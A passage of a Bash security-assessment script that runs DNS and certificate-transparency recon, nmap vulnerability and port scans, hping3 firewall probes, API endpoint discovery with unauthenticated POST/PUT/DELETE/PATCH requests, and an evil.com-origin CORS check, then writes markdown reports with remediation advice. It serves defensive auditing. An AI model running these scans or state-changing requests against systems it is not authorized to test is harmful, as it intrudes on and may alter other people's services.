    log_debug "Creating scan directory: $SCAN_DIR"
    mkdir -p "$SCAN_DIR"
    cd "$SCAN_DIR" || exit 1
    
    log_success "Created scan directory: $SCAN_DIR"
    log_debug "Current working directory: $(pwd)"
    
    # Initialize report files
    EXEC_REPORT="executive_summary.md"
    TECH_REPORT="technical_report.md"
    VULN_REPORT="vulnerability_report.md"
    API_REPORT="api_security_report.md"
    
    log_debug "Initializing report files"
    # Use ':' for truncation; in zsh a bare redirection runs $NULLCMD (cat),
    # which would block waiting on stdin
    : > "$EXEC_REPORT"
    : > "$TECH_REPORT"
    : > "$VULN_REPORT"
    : > "$API_REPORT"
    
    log_debug "Scan configuration:"
    log_debug "  - Domain: $DOMAIN"
    log_debug "  - Subdomain scanning: $SCAN_SUBDOMAINS"
    log_debug "  - Max subdomains: $MAX_SUBDOMAINS"
    log_debug "  - Vulnerability scanning: $VULN_SCAN"
    log_debug "  - API scanning: $API_SCAN"
    log_debug "  - Network interface: $NETWORK_INTERFACE"
}

################################################################################
# DNS Reconnaissance
################################################################################
dns_reconnaissance() {
    log_info "Performing DNS reconnaissance..."
    log_debug "Resolving domain: $DOMAIN"
    
    # Resolve domain to IP
    IP_ADDRESS=$(dig +short "$DOMAIN" | grep -E '^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$' | head -n1)
    
    if [ -z "$IP_ADDRESS" ]; then
        log_error "Could not resolve domain: $DOMAIN"
        log_debug "DNS resolution failed for $DOMAIN"
        exit 1
    fi
    
    log_success "Resolved $DOMAIN to $IP_ADDRESS"
    log_debug "Target IP address: $IP_ADDRESS"
    
    # Get comprehensive DNS records
    log_debug "Querying DNS records (ANY)..."
    dig "$DOMAIN" ANY > dns_records.txt 2>&1
    log_debug "Querying A records..."
    dig "$DOMAIN" A > dns_a_records.txt 2>&1
    log_debug "Querying MX records..."
    dig "$DOMAIN" MX > dns_mx_records.txt 2>&1
    log_debug "Querying NS records..."
    dig "$DOMAIN" NS > dns_ns_records.txt 2>&1
    log_debug "Querying TXT records..."
    dig "$DOMAIN" TXT > dns_txt_records.txt 2>&1
    
    # Reverse DNS lookup
    log_debug "Performing reverse DNS lookup for $IP_ADDRESS..."
    dig -x "$IP_ADDRESS" > reverse_dns.txt 2>&1
    
    echo "$IP_ADDRESS" > ip_address.txt
    log_debug "DNS reconnaissance complete"
}

################################################################################
# Subdomain Discovery
################################################################################
discover_subdomains() {
    if [ "$SCAN_SUBDOMAINS" = false ]; then
        log_info "Subdomain scanning disabled"
        log_debug "Skipping subdomain discovery"
        echo "0" > subdomain_count.txt
        return
    fi
    
    log_info "Discovering subdomains via certificate transparency..."
    log_debug "Querying crt.sh for subdomains of $DOMAIN"
    log_debug "Maximum subdomains to discover: $MAX_SUBDOMAINS"
    
    # Query crt.sh for subdomains
    curl -s "https://crt.sh/?q=%25.${DOMAIN}&output=json" | \
        jq -r '.[].name_value' | \
        sed 's/\*\.//g' | \
        sort -u | \
        grep -E "^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.${DOMAIN}$" | \
        head -n "$MAX_SUBDOMAINS" > subdomains_discovered.txt
    
    SUBDOMAIN_COUNT=$(wc -l < subdomains_discovered.txt | tr -d ' ')
    echo "$SUBDOMAIN_COUNT" > subdomain_count.txt
    
    log_success "Discovered $SUBDOMAIN_COUNT subdomains (limited to $MAX_SUBDOMAINS)"
    log_debug "Subdomains saved to: subdomains_discovered.txt"
}

################################################################################
# SSL/TLS Analysis
################################################################################
ssl_tls_analysis() {
    log_info "Analyzing SSL/TLS configuration..."
    log_debug "Connecting to ${DOMAIN}:443 for certificate analysis"
    
    # Get certificate details
    log_debug "Extracting certificate details..."
    echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -text > certificate_details.txt 2>&1
    
    # Extract key information
    log_debug "Extracting certificate issuer..."
    CERT_ISSUER=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -issuer | sed 's/issuer=//')
    
    log_debug "Extracting certificate subject..."
    CERT_SUBJECT=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -subject | sed 's/subject=//')
    
    log_debug "Extracting certificate dates..."
    CERT_DATES=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -dates)
    
    echo "$CERT_ISSUER" > cert_issuer.txt
    echo "$CERT_SUBJECT" > cert_subject.txt
    echo "$CERT_DATES" > cert_dates.txt
    
    log_debug "Certificate issuer: $CERT_ISSUER"
    log_debug "Certificate subject: $CERT_SUBJECT"
    
    # Enumerate SSL/TLS ciphers
    log_info "Enumerating SSL/TLS ciphers..."
    log_debug "Running nmap ssl-enum-ciphers script on port 443"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_ciphers.txt > /dev/null 2>&1
    else
        nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -oN ssl_ciphers.txt > /dev/null 2>&1
    fi
    
    # Check for TLS versions
    log_debug "Analyzing TLS protocol versions..."
    # grep -c prints 0 itself when nothing matches; "|| true" only absorbs the
    # nonzero exit status (an "|| echo 0" fallback would produce "0\n0")
    TLS_12=$(grep -c "TLSv1\.2" ssl_ciphers.txt || true)
    TLS_13=$(grep -c "TLSv1\.3" ssl_ciphers.txt || true)
    TLS_10=$(grep -c "TLSv1\.0" ssl_ciphers.txt || true)
    TLS_11=$(grep -c "TLSv1\.1" ssl_ciphers.txt || true)
    
    echo "TLSv1.0: $TLS_10" > tls_versions.txt
    echo "TLSv1.1: $TLS_11" >> tls_versions.txt
    echo "TLSv1.2: $TLS_12" >> tls_versions.txt
    echo "TLSv1.3: $TLS_13" >> tls_versions.txt
    
    log_debug "TLS versions found - 1.0:$TLS_10 1.1:$TLS_11 1.2:$TLS_12 1.3:$TLS_13"
    
    # Check for SSL vulnerabilities
    log_info "Checking for SSL/TLS vulnerabilities..."
    log_debug "Running SSL vulnerability scripts (heartbleed, poodle, dh-params)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
    else
        nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
    fi
    
    log_success "SSL/TLS analysis complete"
}

################################################################################
# Port Scanning with Service Detection
################################################################################
port_scanning() {
    log_info "Performing comprehensive port scan..."
    log_debug "Target IP: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # Quick scan of top 1000 ports
    log_info "Scanning top 1000 ports..."
    log_debug "Running nmap with service version detection (-sV) and default scripts (-sC)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN port_scan_top1000.txt > /dev/null 2>&1
    else
        nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -oN port_scan_top1000.txt > /dev/null 2>&1
    fi
    
    # Count open ports
    OPEN_PORTS=$(grep -c "^[0-9]*/tcp.*open" port_scan_top1000.txt || true)
    echo "$OPEN_PORTS" > open_ports_count.txt
    log_debug "Found $OPEN_PORTS open ports"
    
    # Extract open ports list with versions
    log_debug "Extracting open ports list with service information"
    grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | awk '{print $1, $3, $4, $5, $6}' > open_ports_list.txt
    
    # Detect service versions for old software
    log_info "Detecting service versions..."
    log_debug "Filtering service version information"
    # nmap's normal output has no literal "version" or "product" keywords; keep
    # open-port lines that carry a service/version column instead
    grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | awk 'NF > 3' > service_versions.txt || true
    
    log_success "Port scan complete: $OPEN_PORTS open ports found"
}

################################################################################
# Vulnerability Scanning
################################################################################
vulnerability_scanning() {
    if [ "$VULN_SCAN" = false ]; then
        log_info "Vulnerability scanning disabled"
        log_debug "Skipping vulnerability scanning"
        return
    fi
    
    log_info "Performing vulnerability scanning (this may take 10-20 minutes)..."
    log_debug "Target: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # NMAP vulnerability scripts
    log_info "Running NMAP vulnerability scripts..."
    log_debug "Starting comprehensive vulnerability scan on all ports (-p-)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script vuln -p- "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
    else
        nmap --script vuln -p- "$IP_ADDRESS" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
    fi
    VULN_PID=$!
    log_debug "Vulnerability scan PID: $VULN_PID"
    
    # Wait with progress indicator
    log_debug "Waiting for vulnerability scan to complete..."
    while kill -0 $VULN_PID 2>/dev/null; do
        echo -n "."
        sleep 5
    done
    echo
    
    # Parse vulnerability results
    if [ -f nmap_vuln_scan.txt ]; then
        log_debug "Parsing vulnerability scan results"
        grep -i "VULNERABLE" nmap_vuln_scan.txt > vulnerabilities_found.txt || echo "No vulnerabilities found" > vulnerabilities_found.txt
        VULN_COUNT=$(grep -c "VULNERABLE" nmap_vuln_scan.txt || true)
        echo "$VULN_COUNT" > vulnerability_count.txt
        log_success "Vulnerability scan complete: $VULN_COUNT vulnerabilities found"
        log_debug "Vulnerability details saved to: vulnerabilities_found.txt"
    fi
    
    # Check for specific vulnerabilities
    log_info "Checking for common HTTP vulnerabilities..."
    log_debug "Running HTTP vulnerability scripts on ports 80,443,8080,8443"
    # Quote the script wildcard so the shell cannot glob-expand it against
    # files in the scan directory
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script "http-vuln-*" -p 80,443,8080,8443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN http_vulnerabilities.txt > /dev/null 2>&1
    else
        nmap --script "http-vuln-*" -p 80,443,8080,8443 "$IP_ADDRESS" -oN http_vulnerabilities.txt > /dev/null 2>&1
    fi
    log_debug "HTTP vulnerability scan complete"
}

################################################################################
# hping3 Testing
################################################################################
hping3_testing() {
    if ! command -v hping3 >/dev/null 2>&1; then
        log_warning "hping3 not installed, skipping firewall tests"
        log_debug "hping3 command not found in PATH"
        return
    fi
    
    log_info "Performing hping3 firewall tests..."
    log_debug "Target: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # TCP SYN scan
    log_info "Testing TCP SYN response..."
    log_debug "Sending 5 TCP SYN packets to port 80"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -S -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
    else
        timeout 10 hping3 -S -p 80 -c 5 "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
    fi
    log_debug "TCP SYN test complete"
    
    # TCP ACK scan (firewall detection)
    log_info "Testing firewall with TCP ACK..."
    log_debug "Sending 5 TCP ACK packets to port 80 for firewall detection"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -A -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
    else
        timeout 10 hping3 -A -p 80 -c 5 "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
    fi
    log_debug "TCP ACK test complete"
    
    # ICMP test
    log_info "Testing ICMP response..."
    log_debug "Sending 5 ICMP echo requests"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -1 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
    else
        timeout 10 hping3 -1 -c 5 "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
    fi
    log_debug "ICMP test complete"
    
    log_success "hping3 tests complete"
}

################################################################################
# Asset Discovery
################################################################################
asset_discovery() {
    log_info "Performing detailed asset discovery..."
    log_debug "Creating assets directory"
    
    mkdir -p assets
    
    # Web technology detection
    log_info "Detecting web technologies..."
    log_debug "Fetching HTTP headers from https://${DOMAIN}"
    curl -s -I "https://${DOMAIN}" | grep -i "server\|x-powered-by\|x-aspnet-version" > assets/web_technologies.txt || echo "No identifying headers found" > assets/web_technologies.txt
    log_debug "Web technologies saved to: assets/web_technologies.txt"
    
    # Detect CMS
    log_info "Detecting CMS and frameworks..."
    log_debug "Analyzing page content for CMS signatures"
    curl -s "https://${DOMAIN}" | grep -iE "wordpress|joomla|drupal|magento|shopify" > assets/cms_detection.txt || echo "No CMS detected" > assets/cms_detection.txt
    log_debug "CMS detection complete"
    
    # JavaScript libraries
    log_info "Detecting JavaScript libraries..."
    log_debug "Searching for common JavaScript libraries"
    curl -s "https://${DOMAIN}" | grep -oE "jquery|angular|react|vue|bootstrap" | sort -u > assets/js_libraries.txt || echo "None detected" > assets/js_libraries.txt
    log_debug "JavaScript libraries saved to: assets/js_libraries.txt"
    
    # Check for common files
    log_info "Checking for common files..."
    log_debug "Testing for robots.txt, sitemap.xml, security.txt, etc."
    for file in robots.txt sitemap.xml security.txt .well-known/security.txt humans.txt; do
        log_debug "Checking for: $file"
        if curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}/${file}" | grep -q "200"; then
            echo "$file: Found" >> assets/common_files.txt
            log_debug "Found: $file"
            curl -s "https://${DOMAIN}/${file}" > "assets/${file//\//_}"
        fi
    done
    
    # Server fingerprinting
    log_info "Fingerprinting server..."
    log_debug "Running nmap HTTP server header and title scripts"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN assets/server_fingerprint.txt > /dev/null 2>&1
    else
        nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -oN assets/server_fingerprint.txt > /dev/null 2>&1
    fi
    
    log_success "Asset discovery complete"
}

################################################################################
# Old Software Detection
################################################################################
detect_old_software() {
    log_info "Detecting outdated software versions..."
    log_debug "Creating old_software directory"
    
    mkdir -p old_software
    
    # Parse service versions from port scan
    if [ -f service_versions.txt ]; then
        log_debug "Analyzing service versions for outdated software"
        
        # Check for old Apache versions (patterns are anchored to the product
        # name so stray digits elsewhere on the line don't trigger a match)
        log_debug "Checking for old Apache versions..."
        grep -iE "apache[/ ](1\.|2\.0|2\.2)" service_versions.txt > old_software/apache_old.txt || true
        
        # Check for old OpenSSH versions
        log_debug "Checking for old OpenSSH versions..."
        grep -iE "openssh[_/ ][1-6]\." service_versions.txt > old_software/openssh_old.txt || true
        
        # Check for old PHP versions
        log_debug "Checking for old PHP versions..."
        grep -iE "php[/ ][1-5]\." service_versions.txt > old_software/php_old.txt || true
        
        # Check for old MySQL versions
        log_debug "Checking for old MySQL versions..."
        grep -iE "mysql[/ ][1-4]\." service_versions.txt > old_software/mysql_old.txt || true
        
        # Check for old nginx versions
        log_debug "Checking for old nginx versions..."
        grep -iE "nginx[/ ](0\.|1\.0|1\.1[0-5])" service_versions.txt > old_software/nginx_old.txt || true
    fi
    
    # Check SSL/TLS for old versions
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        log_debug "Outdated TLS protocols detected"
        echo "Outdated TLS protocols detected: TLSv1.0 or TLSv1.1" > old_software/tls_old.txt
    fi
    
    # Count old software findings
    OLD_SOFTWARE_COUNT=$(find old_software -type f ! -empty | wc -l)
    echo "$OLD_SOFTWARE_COUNT" > old_software_count.txt
    
    if [ "$OLD_SOFTWARE_COUNT" -gt 0 ]; then
        log_warning "Found $OLD_SOFTWARE_COUNT outdated software components"
        log_debug "Outdated software details saved in old_software/ directory"
    else
        log_success "No obviously outdated software detected"
    fi
}

################################################################################
# API Discovery
################################################################################
api_discovery() {
    if [ "$API_SCAN" = false ]; then
        log_info "API scanning disabled"
        log_debug "Skipping API discovery"
        return
    fi
    
    log_info "Discovering APIs..."
    log_debug "Creating api_discovery directory"
    
    mkdir -p api_discovery
    
    # Common API paths
    API_PATHS=(
        "/api"
        "/api/v1"
        "/api/v2"
        "/rest"
        "/graphql"
        "/swagger"
        "/swagger.json"
        "/api-docs"
        "/openapi.json"
        "/.well-known/openapi"
    )
    
    log_debug "Testing ${#API_PATHS[@]} common API endpoints"
    for path in "${API_PATHS[@]}"; do
        log_debug "Testing: $path"
        # curl reports 000 when the request itself fails (timeout, DNS, TLS);
        # don't record that as a live endpoint
        HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" --max-time 10 "https://${DOMAIN}${path}")
        if [ "$HTTP_CODE" != "404" ] && [ "$HTTP_CODE" != "000" ]; then
            echo "$path: HTTP $HTTP_CODE" >> api_discovery/endpoints_found.txt
            log_debug "Found API endpoint: $path (HTTP $HTTP_CODE)"
            curl -s "https://${DOMAIN}${path}" > "api_discovery/${path//\//_}.txt" 2>/dev/null || true
        fi
    done
    
    # Check for API documentation
    log_info "Checking for API documentation..."
    log_debug "Testing for Swagger UI and API docs"
    curl -s "https://${DOMAIN}/swagger-ui" > api_discovery/swagger_ui.txt 2>/dev/null || true
    curl -s "https://${DOMAIN}/api/docs" > api_discovery/api_docs.txt 2>/dev/null || true
    
    log_success "API discovery complete"
}

################################################################################
# API Permission Testing
################################################################################
api_permission_testing() {
    if [ "$API_SCAN" = false ]; then
        log_debug "API scanning disabled, skipping permission testing"
        return
    fi
    
    log_info "Testing API permissions..."
    log_debug "Creating api_permissions directory"
    
    mkdir -p api_permissions
    
    # Test common API endpoints without authentication
    if [ -f api_discovery/endpoints_found.txt ]; then
        log_debug "Testing discovered API endpoints for authentication issues"
        while IFS= read -r endpoint; do
            API_PATH=$(echo "$endpoint" | cut -d: -f1)
            
            # Test GET without auth
            log_info "Testing $API_PATH without authentication..."
            log_debug "Sending unauthenticated GET request to $API_PATH"
            HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}${API_PATH}")
            echo "$API_PATH: $HTTP_CODE" >> api_permissions/unauth_access.txt
            log_debug "Response: HTTP $HTTP_CODE"
            
            # Test common HTTP methods
            log_debug "Testing HTTP methods on $API_PATH"
            for method in GET POST PUT DELETE PATCH; do
                HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" -X "$method" "https://${DOMAIN}${API_PATH}")
                if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "201" ]; then
                    log_warning "$API_PATH allows $method without authentication (HTTP $HTTP_CODE)"
                    echo "$API_PATH: $method - HTTP $HTTP_CODE" >> api_permissions/method_issues.txt
                fi
            done
        done < api_discovery/endpoints_found.txt
    fi
    
    # Check for CORS misconfigurations
    log_info "Checking CORS configuration..."
    log_debug "Testing CORS headers with evil.com origin"
    curl -s -H "Origin: https://evil.com" -I "https://${DOMAIN}/api" | grep -i "access-control" > api_permissions/cors_headers.txt || true
    
    log_success "API permission testing complete"
}

################################################################################
# HTTP Security Headers
################################################################################
http_security_headers() {
    log_info "Analyzing HTTP security headers..."
    log_debug "Fetching headers from https://${DOMAIN}"
    
    # Get headers from main domain
    curl -I "https://${DOMAIN}" 2>/dev/null > http_headers.txt
    
    # Check for specific security headers
    declare -A HEADERS=(
        ["x-frame-options"]="X-Frame-Options"
        ["x-content-type-options"]="X-Content-Type-Options"
        ["strict-transport-security"]="Strict-Transport-Security"
        ["content-security-policy"]="Content-Security-Policy"
        ["referrer-policy"]="Referrer-Policy"
        ["permissions-policy"]="Permissions-Policy"
        ["x-xss-protection"]="X-XSS-Protection"
    )
    
    log_debug "Checking for security headers"
    > security_headers_status.txt
    for header in "${!HEADERS[@]}"; do
        if grep -qi "^${header}:" http_headers.txt; then
            echo "${HEADERS[$header]}: Present" >> security_headers_status.txt
        else
            echo "${HEADERS[$header]}: Missing" >> security_headers_status.txt
        fi
    done
    
    log_success "HTTP security headers analysis complete"
}

################################################################################
# Subdomain Scanning
################################################################################
scan_subdomains() {
    if [ "$SCAN_SUBDOMAINS" = false ] || [ ! -f subdomains_discovered.txt ]; then
        log_debug "Subdomain scanning disabled or no subdomains discovered"
        return
    fi
    
    log_info "Scanning discovered subdomains..."
    log_debug "Creating subdomain_scans directory"
    
    mkdir -p subdomain_scans
    
    local count=0
    while IFS= read -r subdomain; do
        count=$((count + 1))
        log_info "Scanning subdomain $count/$SUBDOMAIN_COUNT: $subdomain"
        log_debug "Testing accessibility of $subdomain"
        
        # Quick check if subdomain is accessible
        HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${subdomain}" --max-time 5)
        
        if echo "$HTTP_CODE" | grep -q "^[2-4]"; then
            log_debug "$subdomain is accessible (HTTP $HTTP_CODE)"
            
            # Get headers
            log_debug "Fetching headers from $subdomain"
            curl -I "https://${subdomain}" 2>/dev/null > "subdomain_scans/${subdomain}_headers.txt"
            
            # Quick port check (top 100 ports)
            log_debug "Scanning top 100 ports on $subdomain"
            if [ -n "$NETWORK_INTERFACE" ]; then
                nmap --top-ports 100 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
            else
                nmap --top-ports 100 "$subdomain" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
            fi
            
            # Check for old software
            log_debug "Checking service versions on $subdomain"
            if [ -n "$NETWORK_INTERFACE" ]; then
                nmap -sV --top-ports 10 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
            else
                nmap -sV --top-ports 10 "$subdomain" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
            fi
            
            log_success "Scanned: $subdomain (HTTP $HTTP_CODE)"
        else
            log_warning "Subdomain not accessible: $subdomain (HTTP $HTTP_CODE)"
        fi
    done < subdomains_discovered.txt
    
    log_success "Subdomain scanning complete"
}

################################################################################
# Generate Executive Summary
################################################################################
generate_executive_summary() {
    log_info "Generating executive summary..."
    log_debug "Creating executive summary report"
    
    cat > "$EXEC_REPORT" << EOF
# Executive Summary
## Enhanced Security Assessment Report

**Target Domain:** $DOMAIN  
**Target IP:** $IP_ADDRESS  
**Scan Date:** $SCAN_DATE  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE

---

## Overview

This report summarizes the comprehensive security assessment findings for $DOMAIN. The assessment included passive reconnaissance, vulnerability scanning, asset discovery, and API security testing.

---

## Key Findings

### 1. Domain Information

- **Primary Domain:** $DOMAIN
- **IP Address:** $IP_ADDRESS
- **Subdomains Discovered:** $(cat subdomain_count.txt)

### 2. SSL/TLS Configuration

**Certificate Information:**
\`\`\`
Issuer: $(cat cert_issuer.txt)
Subject: $(cat cert_subject.txt)
$(cat cert_dates.txt)
\`\`\`

**TLS Protocol Support:**
\`\`\`
$(cat tls_versions.txt)
\`\`\`

**Assessment:**
EOF

    # Add TLS assessment
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "⚠️ **Warning:** Outdated TLS protocols detected (TLSv1.0/1.1)" >> "$EXEC_REPORT"
    else
        echo "✅ **Good:** Only modern TLS protocols detected (TLSv1.2/1.3)" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 3. Port Exposure

- **Open Ports (Top 1000):** $(cat open_ports_count.txt)

**Open Ports List:**
\`\`\`
$(cat open_ports_list.txt)
\`\`\`

### 4. Vulnerability Assessment

EOF

    if [ "$VULN_SCAN" = true ] && [ -f vulnerability_count.txt ]; then
        cat >> "$EXEC_REPORT" << EOF
- **Vulnerabilities Found:** $(cat vulnerability_count.txt)

**Vulnerability Findings (first 20 lines):**
\`\`\`
$(head -20 vulnerabilities_found.txt)
\`\`\`

EOF
    else
        echo "Vulnerability scanning was not performed." >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 5. Outdated Software

- **Outdated Components Found:** $(cat old_software_count.txt)

EOF

    if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
        echo "**Outdated Software Detected:**" >> "$EXEC_REPORT"
        echo "\`\`\`" >> "$EXEC_REPORT"
        find old_software -type f ! -empty -exec basename {} \; >> "$EXEC_REPORT"
        echo "\`\`\`" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 6. API Security

EOF

    if [ "$API_SCAN" = true ]; then
        if [ -f api_discovery/endpoints_found.txt ]; then
            cat >> "$EXEC_REPORT" << EOF
**API Endpoints Discovered:**
\`\`\`
$(cat api_discovery/endpoints_found.txt)
\`\`\`

EOF
        fi
        
        if [ -f api_permissions/method_issues.txt ]; then
            cat >> "$EXEC_REPORT" << EOF
**API Permission Issues:**
\`\`\`
$(cat api_permissions/method_issues.txt)
\`\`\`

EOF
        fi
    else
        echo "API scanning was not performed." >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 7. HTTP Security Headers

\`\`\`
$(cat security_headers_status.txt)
\`\`\`

---

## Priority Recommendations

### Immediate Actions (Priority 1)

EOF

    # Add specific recommendations
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "1. **Disable TLSv1.0/1.1:** Update TLS configuration immediately" >> "$EXEC_REPORT"
    fi
    
    if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
        echo "2. **Patch Vulnerabilities:** Address $(cat vulnerability_count.txt) identified vulnerabilities" >> "$EXEC_REPORT"
    fi
    
    if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
        echo "3. **Update Software:** Upgrade $(cat old_software_count.txt) outdated components" >> "$EXEC_REPORT"
    fi
    
    if grep -q "Missing" security_headers_status.txt; then
        echo "4. **Implement Security Headers:** Add missing HTTP security headers" >> "$EXEC_REPORT"
    fi
    
    if [ -f api_permissions/method_issues.txt ]; then
        echo "5. **Fix API Permissions:** Implement proper authentication on exposed APIs" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### Review Actions (Priority 2)

1. Review all open ports and close unnecessary services
2. Audit subdomain inventory and decommission unused subdomains
3. Implement API authentication and authorization
4. Establish a regular vulnerability scanning schedule
5. Define a software update policy and procedures

---

## Next Steps

1. Review detailed technical and vulnerability reports
2. Prioritize remediation based on risk assessment
3. Implement security improvements
4. Schedule follow-up assessment after remediation

---

**Report Generated:** $(date)  
**Scan Directory:** $SCAN_DIR

**Additional Reports:**
- Technical Report: technical_report.md
- Vulnerability Report: vulnerability_report.md
- API Security Report: api_security_report.md

EOF

    log_success "Executive summary generated: $EXEC_REPORT"
    log_debug "Executive summary saved to: $SCAN_DIR/$EXEC_REPORT"
}

################################################################################
# Generate Technical Report
################################################################################
generate_technical_report() {
    log_info "Generating detailed technical report..."
    log_debug "Creating technical report"
    
    cat > "$TECH_REPORT" << EOF
# Technical Security Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE  
**Classification:** CONFIDENTIAL

---

## 1. Scope

**Primary Target:** $DOMAIN  
**IP Address:** $IP_ADDRESS  
**Subdomain Scanning:** $([ "$SCAN_SUBDOMAINS" = true ] && echo "Enabled" || echo "Disabled")  
**Vulnerability Scanning:** $([ "$VULN_SCAN" = true ] && echo "Enabled" || echo "Disabled")  
**API Testing:** $([ "$API_SCAN" = true ] && echo "Enabled" || echo "Disabled")

---

## 2. DNS Configuration

\`\`\`
$(cat dns_records.txt)
\`\`\`

---

## 3. SSL/TLS Configuration

\`\`\`
$(cat certificate_details.txt)
\`\`\`

---

## 4. Port Scan Results

\`\`\`
$(cat port_scan_top1000.txt)
\`\`\`

---

## 5. Vulnerability Assessment

EOF

    if [ "$VULN_SCAN" = true ]; then
        cat >> "$TECH_REPORT" << EOF
### 5.1 NMAP Vulnerability Scan

\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`

### 5.2 HTTP Vulnerabilities

\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`

### 5.3 SSL/TLS Vulnerabilities

\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`

EOF
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 6. Asset Discovery

### 6.1 Web Technologies

\`\`\`
$(cat assets/web_technologies.txt)
\`\`\`

### 6.2 CMS Detection

\`\`\`
$(cat assets/cms_detection.txt)
\`\`\`

### 6.3 JavaScript Libraries

\`\`\`
$(cat assets/js_libraries.txt)
\`\`\`

### 6.4 Common Files

\`\`\`
$(cat assets/common_files.txt 2>/dev/null || echo "No common files found")
\`\`\`

---

## 7. Outdated Software

EOF

    if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
        for file in old_software/*.txt; do
            if [ -f "$file" ] && [ -s "$file" ]; then
                echo "### $(basename "$file" .txt)" >> "$TECH_REPORT"
                echo "\`\`\`" >> "$TECH_REPORT"
                cat "$file" >> "$TECH_REPORT"
                echo "\`\`\`" >> "$TECH_REPORT"
                echo >> "$TECH_REPORT"
            fi
        done
    else
        echo "No outdated software detected." >> "$TECH_REPORT"
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 8. API Security

EOF

    if [ "$API_SCAN" = true ]; then
        cat >> "$TECH_REPORT" << EOF
### 8.1 API Endpoints

\`\`\`
$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`

### 8.2 API Permissions

\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No permission issues found")
\`\`\`

